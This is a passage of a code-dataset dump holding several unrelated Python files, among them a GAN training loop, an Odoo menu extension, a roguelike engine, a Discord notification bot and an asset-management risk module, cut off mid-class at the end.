1)\r\n alpha = alpha.expand(BATCH_SIZE, real_data.nelement()//BATCH_SIZE).contiguous().view(BATCH_SIZE, 3, 32, 32)\r\n alpha = alpha.cuda()\r\n\r\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\r\n\r\n\r\n interpolates = interpolates.cuda()\r\n interpolates = autograd.Variable(interpolates, requires_grad=True)\r\n\r\n disc_interpolates = netD(interpolates)\r\n\r\n gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,\r\n grad_outputs=torch.ones(disc_interpolates.size()).cuda(),\r\n create_graph=True, retain_graph=True, only_inputs=True)[0]\r\n gradients = gradients.view(gradients.size(0), -1)\r\n\r\n gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * 10\r\n return gradient_penalty\r\n\r\ndef compute_grad2(d_out, x_in):\r\n batch_size = x_in.size(0)\r\n grad_dout = autograd.grad(\r\n outputs=d_out.sum(), inputs=x_in,\r\n create_graph=True, retain_graph=True, only_inputs=True\r\n )[0]\r\n grad_dout2 = grad_dout.pow(2)\r\n assert(grad_dout2.size() == x_in.size())\r\n reg = grad_dout2.view(batch_size, -1).sum(1)\r\n return reg\r\n\r\nif __name__ == \"__main__\":\r\n # random seed\r\n torch.manual_seed(0)\r\n transform = []\r\n transform.append(T.RandomHorizontalFlip())\r\n transform.append(T.CenterCrop(32))\r\n transform.append(T.Resize(32))\r\n transform.append(T.ToTensor())\r\n transform.append(T.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)))\r\n transforms.Lambda(lambda x: x + 1./128 * torch.rand(x.size()))\r\n transform = T.Compose(transform)\r\n\r\n\r\n dataset = torchvision.datasets.CIFAR10(root='./cifar10', transform=transform, download=True)\r\n data_loader = torch.utils.data.DataLoader(dataset=dataset,\r\n batch_size=64,\r\n shuffle=True,\r\n drop_last=True,\r\n num_workers=8)\r\n\r\n G = Generator().cuda()\r\n D = Discriminator().cuda()\r\n D.load_state_dict(torch.load('./checkpoint/25000_D.pth'))\r\n G.load_state_dict(torch.load('./checkpoint/25000_G.pth'))\r\n optimizer_G = torch.optim.RMSprop(G.parameters(), lr=1e-4, alpha=0.99, eps=1e-8)\r\n optimizer_D = torch.optim.RMSprop(D.parameters(), lr=1e-4, alpha=0.99, eps=1e-8)\r\n 
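# Added note: two critic regularizers are defined above. calc_gradient_penalty\r\n    # is the classic WGAN-GP penalty E[(||grad D(x_hat)||_2 - 1)^2] on interpolates;\r\n    # the training loop below instead uses 10 * compute_grad2(d_real4d, data).mean(),\r\n    # an R1-style gradient penalty on real samples only (Mescheder et al., 2018).\r\n    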
print(\"start...\")\r\n dataiter = iter(data_loader)\r\n for idx in range(2000000):\r\n time_start = datetime.datetime.now()\r\n try:\r\n data, label = next(dataiter)\r\n except:\r\n dataiter = iter(data_loader)\r\n data, label = next(dataiter)\r\n\r\n data = data.cuda()\r\n \r\n if idx % 5 == 0:\r\n z = torch.randn(64, 128).cuda()\r\n fake = G(z)\r\n d_fake4g = D(fake)\r\n optimizer_G.zero_grad()\r\n loss_g = torch.mean(d_fake4g)\r\n loss_g.backward()\r\n optimizer_G.step()\r\n\r\n z = torch.randn(64, 128).cuda()\r\n fake = G(z)\r\n d_fake4d = D(fake.detach())\r\n data.requires_grad_()\r\n d_real4d = D(data)\r\n optimizer_D.zero_grad()\r\n #gp = calc_gradient_penalty(D, data, fake)\r\n gp = 10 * compute_grad2(d_real4d, data).mean()\r\n loss_d = torch.mean(d_real4d.mean() - d_fake4d.mean()) + gp\r\n loss_d.backward()\r\n optimizer_D.step()\r\n\r\n\r\n #save model\r\n if (idx+1)%25000 == 0:\r\n #\r\n \r\n torch.save(G.state_dict(), \"./checkpoint/{}_G.pth\".format(idx+25001))\r\n torch.save(D.state_dict(), \"./checkpoint/{}_D.pth\".format(idx+25001))\r\n #\r\n\r\n if (idx+1)%5000 == 0:\r\n torchvision.utils.save_image(fake, './samples/f{}.png'.format(idx+25001), nrow=8 , normalize=True)\r\n time_end = datetime.datetime.now()\r\n print('[%d/%d] D(x): %.4f D(G(z)): %.4f/ %.4f'% (idx+1, 2000000, d_real4d.mean().item(),\\\r\n d_fake4d.mean().item(), d_fake4g.mean().item()))\r\n #print('alpha: ', model.alpha)\r\n print(\"remains {:.4f} minutes...\".format((time_end - time_start).total_seconds() / 60. * (500000 - idx)))\r\n","sub_path":"successful models/WGAN_GP-RES/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"412802101","text":"# -*- coding: utf-'8' \"-*-\"\n__author__ = 'Michael Karrer'\nfrom openerp.osv import osv\nfrom openerp import api, tools\nfrom openerp.tools import SUPERUSER_ID\n\n\nclass ir_ui_menu(osv.osv):\n _inherit = 'ir.ui.menu'\n\n @api.cr_uid_context\n @tools.ormcache_context(accepted_keys=('lang',))\n def load_menus(self, cr, uid, context=None):\n xmlid_obj = self.pool['ir.model.data']\n\n def add_xmlid_to_menu_root(mr={}):\n id = mr.get('id', False)\n if id:\n rec_id = xmlid_obj.search(cr, SUPERUSER_ID, [('model', '=', 'ir.ui.menu'), ('res_id', '=', id)], context=context)\n if rec_id:\n rec = xmlid_obj.browse(cr, SUPERUSER_ID, rec_id, context=context)\n if rec and rec.complete_name:\n mr['xml_id'] = rec.complete_name\n children = mr.get('children', False)\n if children:\n for child in children:\n add_xmlid_to_menu_root(mr=child)\n\n menu_root = super(ir_ui_menu, self).load_menus(cr=cr, uid=uid, context=context)\n\n add_xmlid_to_menu_root(mr=menu_root)\n\n # THIS COMMENTS/NOTES CAN BE REMOVED AFTER TESTING :)\n # test2 = xmlid_obj.search(cr, uid, [('model', '=', 'ir.ui.menu'), ('res_id', '=', '717')], context=context)\n # test3 = xmlid_obj.browse(cr, uid, test2, context=context)\n # inverse_test = xmlid_obj.get_object_reference(cr, uid, 'fso_base', test3.name)\n # inverse_test2 = xmlid_obj.xmlid_to_object(cr, uid, test3.complete_name)\n\n return menu_root\n","sub_path":"addons-own/web_menu_xmlid/models/ir_ui_menu.py","file_name":"ir_ui_menu.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"459379314","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport cv2\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom 
keras.models import load_model, model_from_json\nimport numpy as np\nfrom utils import padimg\nimport argparse\nfrom dataset_test import get\nfrom keras.applications.imagenet_utils import preprocess_input\n\nparse=argparse.ArgumentParser()\nparse.add_argument('-m', '--modelpath', type=str)\nargs=parse.parse_args()\n\njson_file = open('./logs/model.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\nmodel = model_from_json(loaded_model_json)\n#loaded weights\n\nmdl_pth = args.modelpath\nmodel.load_weights(mdl_pth)\n\nimgs, segmaps = get('train')\ndatanum = len(imgs)\nmae = 0\nmse = 0 \nfor img, segmap in zip(imgs, segmaps):\n h, w = img.shape[0:2]\n padded_img = padimg(img, 32)\n test_data = cv2.cvtColor(padded_img, cv2.COLOR_BGR2RGB)\n test_data = preprocess_input(np.array([test_data]).astype(np.float64))\n pred_heatmap = model.predict(test_data, batch_size=1)[0]\n pred_heatmap = pred_heatmap[:h, :w, :]\n k = 255/pred_heatmap.max()\n vis_heatmap = (pred_heatmap * k).astype('uint8')\n vis_heatmap = np.concatenate((vis_heatmap, vis_heatmap, vis_heatmap), axis=2)\n retimg = np.concatenate((img, vis_heatmap), axis=0)\n pred_num = pred_heatmap.sum() / 20\n num = segmap.sum() / 20\n print('pred_num / num: ', pred_num, '/', num)\n mae += np.abs(pred_num - num)\n mse += (pred_num - num)**2\nprint('mae: ', mae/datanum)\nprint('mse: ', np.sqrt(mse/datanum))\n","sub_path":"keras.resnet.pyramids4.addval.uniform/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321947114","text":"if __name__ == \"__main__\":\n\tfrom sys import path\n\tpath.append(\"../src\")\n\nimport domain\nimport fastsweeping\nimport solver\nimport basis\nimport optexp\nimport wavespeed\nimport mysave\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef test():\n\n\t# create domain\n\ta1 = 0.0; b1 = 0.0;\n\ta2 = 20.0; b2 = 4.0;\n\tnx = 501\n\tgrid = domain.Rectangle(a1, a2, b1, b2, nx)\n\tX,Y = grid.X, grid.Y\n\n\tfeasible_sources = grid.boundary_edge(\"top\", skip=10, flattened=True)\n\tfeasible_receivers = grid.boundary_edge('top', skip=10, flattened=True)\n\n\tc_true = wavespeed.graded_inclusion\n\tc = c_true(grid.X, grid.Y)\n\tplt.imshow(c_true(grid.X, grid.Y).T, origin=\"lower\")\n\tplt.title(\"True wavespeed\")\n\tplt.colorbar()\n\tplt.show()\n\n\tproblem_params = solver.create_problem_params(grid, c_true, feasible_sources = feasible_sources, feasible_receivers = feasible_receivers, c=c, c_reg=False, zero_window = 0, ic_fine=False, u_infty = 1e3, v_infty = 1e3)\t\n\tP_t = solver.TravelTimeProblem(problem_params, debug=False)\n\n\toedproblem_params = optexp.create_oedproblem_params(P_t, epsilon = 1e-10, border_crop = [2,2],\n\t\tcgiter_per_update = 0, ns_per_update = 1, nr_per_source = 17, chunk_size = 500,\n\t\ttheta_switch_point = 250, mask = None, nm_max = 1000)\n\tP_oed = optexp.OEDProblem(oedproblem_params, debug = True)\n\tP_oed.oed_driver(debug = True)\n\nif __name__ == \"__main__\":\n\ttest()\n","sub_path":"tests/findfirstreceivertest.py","file_name":"findfirstreceivertest.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124162920","text":"\"\"\"\n문자열 배열을 받아 애너그램 단위로 그룹핑하라.\nInput: strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\nOutput: [[\"bat\"],[\"nat\",\"tan\"],[\"ate\",\"eat\",\"tea\"]]\n\"\"\"\n\n\nstrs = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", 
\"bat\"]\n\nimport collections\nfrom typing import List\n\ndef groupAnagrams(strs: List[str]) -> List[List[str]]:\n anagrams = collections.defaultdict(list)\n\n for word in strs:\n # 정렬하여 딕셔너리에 추가\n # Delimiter.join(): 리스트를 구분자를 기준으로 string으로 반환. cf) split() : 리스트로 반환\n # ''.join(sorted(word))를 통해 정렬하여 애너그램끼리 같은 key로 그룹핑하고\n # list 형식의 value에 해당 word를 append하는 전략\n anagrams[''.join(sorted(word))].append(word)\n # dict.values()는 view객체에 해당하므로 정확성을 위해 list로 캐스팅 필요\n return list(anagrams.values())\n\nprint(groupAnagrams(strs))\n\nanagrams = collections.defaultdict(list)\n\n\n\n","sub_path":"Algorithm/python_algorithm_interview_exercise/06-5.group_anagrams.py","file_name":"06-5.group_anagrams.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"612751430","text":"\"\"\"\n Engine реализует движок игры.\n Через него происходят все операции, связанные с логикой и механикой игры.\n\"\"\"\n\nimport json\nimport os\n\n# logic\nfrom engine.engine_initializer import EngineInitializer, EngineInfo, EngineLoadTypes\nfrom engine.keys_handler import KeysHandler\n# render\nfrom engine.render import Render\nfrom logic.inventory import *\nfrom logic.patterns.strategy import AggressiveStrategy\nfrom logic.player import Player\nfrom logic.states import State, StateHolder\n\ncolors = {'fov_dark_walls': tc.Color(0, 5, 90),\n 'fov_dark_background': tc.Color(45, 45, 140),\n 'main_wall': tc.Color(167, 103, 65),\n 'main_ground': tc.Color(0, 30, 30),\n 'kate_ground': tc.Color(200, 146, 7)}\n\n\ndef save_game(engine):\n data = engine.serialize()\n\n flag = 'x'\n if os.path.isfile('media/GAME_SAVE.json'):\n flag = 'w'\n\n with open('media/GAME_SAVE.json', flag, encoding='utf-8') as file:\n json.dump(data, file, indent=4)\n\n\nclass Engine:\n def __init__(self, screen_width=80, screen_height=40, fov_mode=False, debug=False, player_lvl=1,\n load_type=EngineLoadTypes.NORMAL, tester=None):\n # состояние игры\n self.IS_GAME = True\n self.load_type = load_type\n self.curr_state = StateHolder(State.PLAYER_TURN)\n self.prev_state = StateHolder(State.PLAYER_TURN)\n if load_type == EngineLoadTypes.LOAD:\n return\n # держатель всех характеристик\n self.info = EngineInfo(screen_width, screen_height, player_lvl, fov_mode, debug)\n # инициализация среды\n self.map = EngineInitializer.init_map(self, load_type)\n self.player = EngineInitializer.init_player(self, load_type)\n self.mobs = EngineInitializer.init_entities(self, load_type)\n self.fov = None\n if fov_mode:\n self.fov = EngineInitializer.init_fov(self)\n if load_type == EngineLoadTypes.TEST:\n self.tester = tester\n\n def get_entities(self):\n return [self.player] + self.mobs\n\n def serialize(self):\n data = {\n \"info\": self.info.serialize(),\n \"player\": self.player.serialize(),\n \"entities\": [m.serialize() for m in self.mobs],\n \"map\": self.map.serialize()\n }\n return data\n\n @staticmethod\n def stop_engine(engine):\n engine.IS_GAME = False\n engine.curr_state = State.PLAYER_DEAD\n return OperationLog([{'message': Message('ENGINE WAS STOPPED.', tc.yellow)}])\n\n def get_command(self):\n command = None\n if self.load_type == EngineLoadTypes.TEST:\n command = self.tester.get_command(self)\n elif self.load_type in [EngineLoadTypes.LOAD, EngineLoadTypes.NORMAL]:\n command = KeysHandler.user_input(self)\n return command\n\n def player_turn(self):\n command = self.get_command()\n operation_log = command.execute()\n\n # логгирование в консоль\n for item in operation_log.log:\n 
message = item.get('message')\n maybe_dead_entity = item.get('dead')\n picked_item = item.get('new_item')\n is_menu_key = item.get('show_menu')\n is_drop_meny_key = item.get('drop_menu')\n is_index = item.get('inv_index')\n is_drop = item.get('drop_item')\n\n if message:\n self.info.msg_log.add_message(message)\n\n if maybe_dead_entity:\n message = maybe_dead_entity.die()\n if isinstance(maybe_dead_entity, Player):\n self.curr_state.value = State.PLAYER_DEAD\n else:\n if isinstance(maybe_dead_entity.strategy, AggressiveStrategy):\n self.info.killed_on_lvl += 1\n self.info.msg_log.add_message(message)\n\n if picked_item:\n operation_log.log.extend(self.player.pick_item(picked_item).log)\n self.mobs.remove(picked_item)\n\n if is_menu_key:\n self.prev_state.value = self.curr_state.value\n self.curr_state.value = State.SHOWING_MENU\n\n if is_drop_meny_key:\n self.prev_state.value = self.curr_state.value\n self.curr_state.value = State.DROP_ITEM\n\n if is_index is not None and is_index >= 0 and \\\n self.prev_state.value != State.PLAYER_DEAD:\n if is_index >= len(self.player.inventory.items):\n operation_log.add_item({'message': Message('Wrong item index.', tc.yellow)})\n continue\n item = self.player.inventory.items[is_index]\n if self.curr_state.value == State.SHOWING_MENU:\n operation_log.log.extend(self.player.inventory.activate_item(item).log)\n elif self.curr_state.value == State.DROP_ITEM:\n operation_log.log.extend(\n self.player.inventory.drop_item(self.get_entities(), item).log)\n\n if is_drop:\n self.prev_state.value = self.curr_state.value\n self.curr_state.value = State.DROP_ITEM\n\n if self.info.killed_on_lvl >= 3:\n self.__init__(self.info.scr_wd,\n self.info.scr_ht,\n fov_mode=self.info.FOV_MODE,\n debug=self.info.DEBUG,\n player_lvl=self.info.player_lvl + 1)\n continue\n\n def mob_turn(self):\n if self.curr_state.value != State.MOB_TURN:\n return\n\n # обновление поведения сущности, если она бот\n for mob in self.mobs:\n operation_log = mob.act(self.player, self.fov, self.map, self.get_entities())\n\n for item in operation_log.log:\n message = item.get('message')\n if message:\n self.info.msg_log.add_message(message)\n\n maybe_dead_entity = item.get('dead')\n if maybe_dead_entity:\n message = maybe_dead_entity.die()\n if isinstance(maybe_dead_entity, Player):\n self.curr_state.value = State.PLAYER_DEAD\n self.info.msg_log.add_message(message)\n\n if self.curr_state.value != State.PLAYER_DEAD:\n self.curr_state.value = State.PLAYER_TURN\n\n def stop(self):\n self.IS_GAME = False\n\n def game_exit(self):\n # если игрок не мертв и мы вышли - сохраняем игру\n if self.curr_state.value != State.PLAYER_DEAD and self.load_type != EngineLoadTypes.TEST:\n save_game(self)\n elif self.load_type != EngineLoadTypes.TEST:\n # удаляем сохранение при смерти\n if os.path.isfile('media/GAME_SAVE.json'):\n os.remove('media/GAME_SAVE.json')\n\n def init_console_font(self):\n # подгрузка шрифта\n tc.console_set_custom_font(self.info.FONT_PATH, tc.FONT_TYPE_GREYSCALE | tc.FONT_LAYOUT_TCOD)\n\n def run(self):\n self.init_console_font()\n # инициализация главной консоли\n with tc.console_init_root(self.info.scr_wd,\n self.info.scr_ht,\n title=self.info.GAME_NAME, fullscreen=False) as root_console:\n while self.IS_GAME:\n # режим открытия карты\n if self.info.FOV_MODE:\n Render.recompute_fov(self, self.player.x, self.player.y, self.info.fov_radius)\n # отрисовка сущностей\n Render.render_all(root_console, self.info.BARS_CONS, self.player,\n self.map, self.get_entities(),\n self.info.scr_wd, 
self.info.scr_ht, colors,\n self.info.FOV_MODE, self.fov, self.info.msg_log, self.curr_state)\n # вывод консоли\n tc.console_flush()\n # удаление предыдущих позиций\n Render.clear_all(root_console, self.get_entities())\n # ход игрока\n self.player_turn()\n # ход мобов\n self.mob_turn()\n\n self.game_exit()\n","sub_path":"test_data/projects/roguelike/project/engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"372344936","text":"import discord\n\n#TOKEN = \"\"\n#TEXTCHANNEL = \"\"\nclient = discord.Client()\n\ntext_chat = discord.Object(TEXTCHANNEL)\n\n@client.event\nasync def on_ready():\n msg = \"LOLbotがログインしたよ!\"\n await client.send_message(text_chat,msg)\n\n@client.event\nasync def on_member_update(before, after):\n if before.game != after.game and before.game == None:\n msg = after.display_name + \"が\" + str(after.game) + \"を開始したよ!\"\n await client.send_message(text_chat,msg)\n\n@client.event\nasync def on_voice_state_update(before, after):\n if before.voice_channel == None:\n msg = after.display_name + \"が\" + after.voice_channel.name + \"に参加したよ!\"\n await client.send_message(text_chat,msg)\n\nclient.run(TOKEN)\n","sub_path":"discordbot.py","file_name":"discordbot.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"228393130","text":"import numpy as np\nimport random\nimport os\n\n\n\n\n\nclass hobbit_base:\n\n def __init__(self, matrix_file = \"matrix.csv\"):\n self.matrix_file = matrix_file\n self.matrix = None\n self.categories = None\n\n\n self._load()\n\n def _load(self):\n matrix_file_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), self.matrix_file)\n # Determine number of columns\n with open(matrix_file_path) as f:\n n_cols = len(f.readline().split(','))\n self.categories = [row.split(',')[0] for row in f.readlines()]\n\n\n self.matrix = np.loadtxt(matrix_file_path, delimiter=',', skiprows=1, usecols=range(1, n_cols))\n\n def reward(self, cell):\n raise NotImplementedError(\"reward is not implemented!\")\n\n def punish(self, cell):\n raise NotImplementedError(\"punish is not implemented!\")\n\n def evaluate_taskset(self, taskset_ans):\n\n for task in taskset_ans:\n task_type = task[0]\n task_level = task[1]\n try:\n task_passed = task[2]\n except:\n task_passed = False\n\n cell = (self.categories.index(task_type), task_level)\n\n # If task was passed, punish task's position in matrix\n if task_passed:\n self.reward(cell)\n # If task was NOT passed, reward task's position in matrix\n else:\n self.punish(cell)\n\n self.taskset = None\n\n\n def get_skill(self):\n\n num_categories = len(self.matrix)\n count = 0\n skill = 0\n\n for y in range(len(self.matrix[0])):\n for x in range(len(self.matrix)):\n count += 1\n cell = self.matrix[x][y]\n cell_difficulty = (count / num_categories)\n skill += ((cell/100) * cell_difficulty)\n return skill\n\n\n # Determine cell of task based on ('while', 0)\n def cell_of(self, task):\n return self.categories.index(task[0]), task[1]\n\n\n def sum(self):\n return np.sum(self.matrix)\n\n def cleanup(self):\n count = 0\n num_categories = len(self.matrix)\n skill = self.get_skill()\n\n for y in range(len(self.matrix[0])):\n for x in range(len(self.matrix)):\n count += 1\n cell_difficulty = (count / num_categories)\n\n\n\n\n\n\n\n def closest_skill_cell(self):\n count = 0\n num_categories = len(self.matrix)\n\n 
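# Added note: enumerate the position-based difficulty of every cell (the same\n        # count/num_categories scale used in get_skill) and return the cell whose\n        # difficulty is numerically closest to the learner's current skill.\n        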
skill_value = []\n skill_cell = []\n\n for y in range(len(self.matrix[0])):\n for x in range(len(self.matrix)):\n count += 1\n cell_difficulty = (count / num_categories)\n\n skill_value.append(cell_difficulty)\n skill_cell.append((x,y))\n\n\n idx = (np.abs(skill_value-self.get_skill())).argmin()\n\n return skill_cell[idx]\n\n def cleanup(self):\n count = 0\n num_categories = len(self.matrix)\n closest_cell = self.closest_skill_cell()\n skill = self.get_skill()\n for y in range(len(self.matrix[0])):\n for x in range(len(self.matrix)):\n count += 1\n cell_difficulty = (count / num_categories)\n\n if cell_difficulty + 0.5 < skill and self.matrix[x][y] > .0:\n #print(\"%s | %s => %s\" % (self.matrix[x][y], (x,y), closest_cell))\n self.matrix[closest_cell[0], closest_cell[1]] += self.matrix[x][y]\n self.matrix[x][y] = .0\n\n\n\n\n\n\n\n\n\n\n\n def avg(self):\n return np.mean(self.matrix)\n\n","sub_path":"Adaptive-Learning/Algorithms/Hobbit/hobbit.py","file_name":"hobbit.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"623492230","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n if not root or not root.left and not root.right:\n return True\n else:\n self.isValid = True\n self.dfs(root)\n return self.isValid\n \n def dfs(self, root):\n if not root.left and not root.right:\n return (root.val, root.val)\n \n if root.left:\n l_max, l_min = self.dfs(root.left)\n if l_max >= root.val:\n self.isValid = False\n if root.right:\n r_max, r_min = self.dfs(root.right)\n if r_min <= root.val:\n self.isValid = False\n \n if root.left and root.right:\n return (max(l_max, r_max, root.val), min(l_min, r_min, root.val))\n elif root.left:\n return (max(l_max, root.val), min(l_min, root.val))\n else:\n return (max(r_max, root.val), min(r_min, root.val))\n","sub_path":"Python/98ValidateBinarySearchTree.py","file_name":"98ValidateBinarySearchTree.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"391160883","text":"# # # # # # # # # # # # # # # # # # # # # # # #\r\n# # \r\n# Module to run real time contingencies #\r\n# By: David Alvarez and Laura Cruz #\r\n# 09-08-2018 #\r\n# Version Aplha-0. 
1 # \r\n# #\r\n# Module inputs: #\r\n# -> File name #\r\n# # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\nimport pandas as pd\r\nimport random\r\nfrom scipy.interpolate import interp1d\r\nimport calendar\r\nimport numpy as np\r\nimport datetime\r\n\r\nfrom APM_Module_Tools import Fitt_constants_HI,Read_Table\r\nfrom APM_Module_Regulatory import APM_Regulatory # Import regulatory class\r\nfrom ACM_Module import ACM # Criticality module\r\n\r\n# Function to allocate asset list\r\ndef Read_Table_Conditions(DB_name,table,row,ID,source_type='Excel'):\r\n if source_type=='Excel':\r\n df = pd.read_excel(open(DB_name, 'rb'), sheet_name=table) # Sheet with loads tags\r\n df = df[df['Serial']==ID] \r\n columms = ['Test_ID', 'Date', row]\r\n df = df[columms]\r\n df = df.rename(columns = {row:'Val'})\r\n df = df.dropna()\r\n return df\r\n# Function to allocate asset data\r\ndef Read_Asset_Data(DB_name,table,ID,source_type='Excel'):\r\n if source_type=='Excel':\r\n df = pd.read_excel(open(DB_name, 'rb'), sheet_name=table) # Sheet with loads tags\r\n df = df[df['Serial']==ID] \r\n return df\r\n\r\ndef Load_Asset_Portfolio(file,table):\r\n df = pd.read_excel(open(file, 'rb'), sheet_name=table) # Sheet with loads tags\r\n df = df.set_index('ID')\r\n return df\r\n\r\nclass APM():\r\n def __init__(self,case_sett,load_growth):\r\n \r\n if 'path' in case_sett.keys():\r\n self.case_path = case_sett['path']\r\n else:\r\n self.case_path = '' \r\n # Asset porfolio source\r\n source = case_sett['portfolio_source']\r\n \r\n\r\n self.Asset_Portfolio_List = Load_Asset_Portfolio(source,'ASSETS')\r\n self.Asset_Location = Load_Asset_Portfolio(source,'LOCATIONS')\r\n asset = {} # create Dictionary of Assets\r\n\r\n #db_structure = case_sett['database_sett']\r\n for id,row in self.Asset_Portfolio_List.iterrows():\r\n #asset[id] = Asset_M(row,id,db_structure)\r\n asset[id] = Asset_M(row,id,case_sett,self.case_path)\r\n self.Asset_Portfolio = asset\r\n self.load_growth = load_growth\r\n\r\n def Compute_All_AM_Index(self,date):\r\n for id in self.Asset_Portfolio:\r\n self.Asset_Portfolio[id].AM_Index(date) \r\n\r\n def POF_Status(self):\r\n assets = self.Asset_Portfolio\r\n fail = {} \r\n \r\n for id in assets:\r\n fail_succes = random.random() \r\n asset = assets[id]\r\n pof = asset.pof_2\r\n if asset.fail==True:\r\n asset.time_fail +=1\r\n if asset.time_fail>asset.mttr: # Check if the asset was repaired\r\n asset.fail =False\r\n asset.time_fail =0\r\n elif fail_succes <= pof: # Dictinary with desconections \r\n asset.fail=True\r\n asset.time_fail =1\r\n \r\n \r\n fail[asset.name]=asset.fail\r\n return fail \r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n def Risk_Index_During_Time(self,Cont,date_beg,n_hours,trail,df_pof=pd.DataFrame()):\r\n cr_obj = ACM(Cont.load_user,Cont.gen_data) # Criticality object, create\r\n \r\n date_beg = datetime.datetime.fromordinal(date_beg.toordinal())\r\n res = []\r\n for n in range(n_hours): \r\n date = date_beg+ datetime.timedelta(hours=n) \r\n l_date = date.date()\r\n h = n%24\r\n if h==0: \r\n if df_pof.empty: \r\n self.Compute_All_AM_Index(l_date) # Update performance index \r\n else: \r\n for l_id in self.Asset_Portfolio: # pof was compute previusly \r\n self.Asset_Portfolio[l_id].pof_2 = df_pof.loc[l_date][l_id]\r\n\r\n '''Asset_status = self.POF_Status() # POF matrix\r\n day_name = calendar.day_name[date.weekday()] \r\n h = n%24\r\n n_days = datetime.timedelta(hours=n).days\r\n growth_rate = Cont.f_growth_rate(n_days) # Growth rate at day 
n\r\n Cr,SAIDI = Cont.Run_Load_Flow(Cont.net,day_name,h,Asset_status,growth_rate=growth_rate)\r\n \r\n\r\n # Review review \r\n #if Cr >0:\r\n if True in Asset_status.values():\r\n Asset_status['Date'] = date\r\n Asset_status['Cr'] = Cr\r\n Asset_status['SAIDI'] = SAIDI\r\n Asset_status['Ite'] = trail\r\n res.append(Asset_status)'''\r\n\r\n Asset_status = self.POF_Status() # POF matrix\r\n\r\n if True in Asset_status.values():\r\n day_name = calendar.day_name[date.weekday()] \r\n n_days = datetime.timedelta(hours=n).days\r\n growth_rate = Cont.f_growth_rate(n_days) # Growth rate at day n\r\n ENS,SAIDI,ENG,BEN = Cont.Run_Load_Flow(Cont.net,day_name,h,Asset_status,cr_obj,growth_rate=growth_rate) \r\n # Update data \r\n Asset_status['Date'] = date\r\n #Asset_status['ES'] =\r\n Asset_status['ENS'] = ENS\r\n #Asset_status['gen'] = PUR_EN \r\n Asset_status['Cr'] = -BEN\r\n Asset_status['SAIDI'] = SAIDI\r\n Asset_status['Ite'] = trail\r\n res.append(Asset_status)\r\n\r\n return res\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \r\n# Eval HI without data # \r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\ndef HI_Replace():\r\n x = np.array([0,20,25,45])\r\n y = np.array([0,0.1,0.35,0.99])\r\n fit_f = Fitt_constants_HI(x,y)\r\n return fit_f\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n# #\r\n# Asset Class # \r\n# # \r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\nclass Asset_M():\r\n def __init__(self,data,id,db,path):\r\n # id -> Asset id\r\n # db -> dbase structure name\r\n self.case_path = path\r\n \r\n self.db = db\r\n db_struc = db['database_sett']#db\r\n \r\n #self.decision = None # List of decisions \r\n self.decision =pd.DataFrame() \r\n\r\n self.id = id\r\n self.name = data.Name\r\n self.type = data.Type\r\n self.mttr = data.MTTR\r\n self.inc = data.Incomes\r\n self.capex = data.CAPEX\r\n self.opex = data.OPEX\r\n self.fail = False\r\n self.time_fail = 0 # Asset time failed\r\n #self.oper_date = datetime.date(1980, 1, 1)\r\n\r\n self.hi_rem = HI_Replace() # Function to estimate the HI of a new asset \r\n\r\n #DB_Model = self.Load_DB_Model(db)\r\n DB_Model = self.Load_DB_Model(db_struc)\r\n HI_Weigths = self.Weights()\r\n HI_Con_Limits = self.Load_Cond_Limits()\r\n\r\n # Load constant data \r\n #->data = Read_Table(db['database_Cons_Set'])\r\n #'Cons'\r\n #->data = Read_Table(data['Cons']['DB_Name'])\r\n #->l_AL = data[self.type] # Average life in years\r\n \r\n\r\n # Load condition \r\n self.cond = self.Load_Condition(DB_Model,HI_Weigths,HI_Con_Limits) \r\n\r\n # Lambda function \r\n self.lambda_f = self.Load_Lambda_Constants()\r\n\r\n # Load asset data \r\n self.data = self.Load_Asset_Data(DB_Model)\r\n\r\n self.reset_init()\r\n # Regulatory conditions\r\n self.apm_reg = APM_Regulatory(self.db,self.data)\r\n\r\n def reset_init(self):\r\n # # # # # # # # # # # # # # #\r\n self.r = None\r\n self.pof = None \r\n self.pof_2 = None\r\n self.r = None \r\n 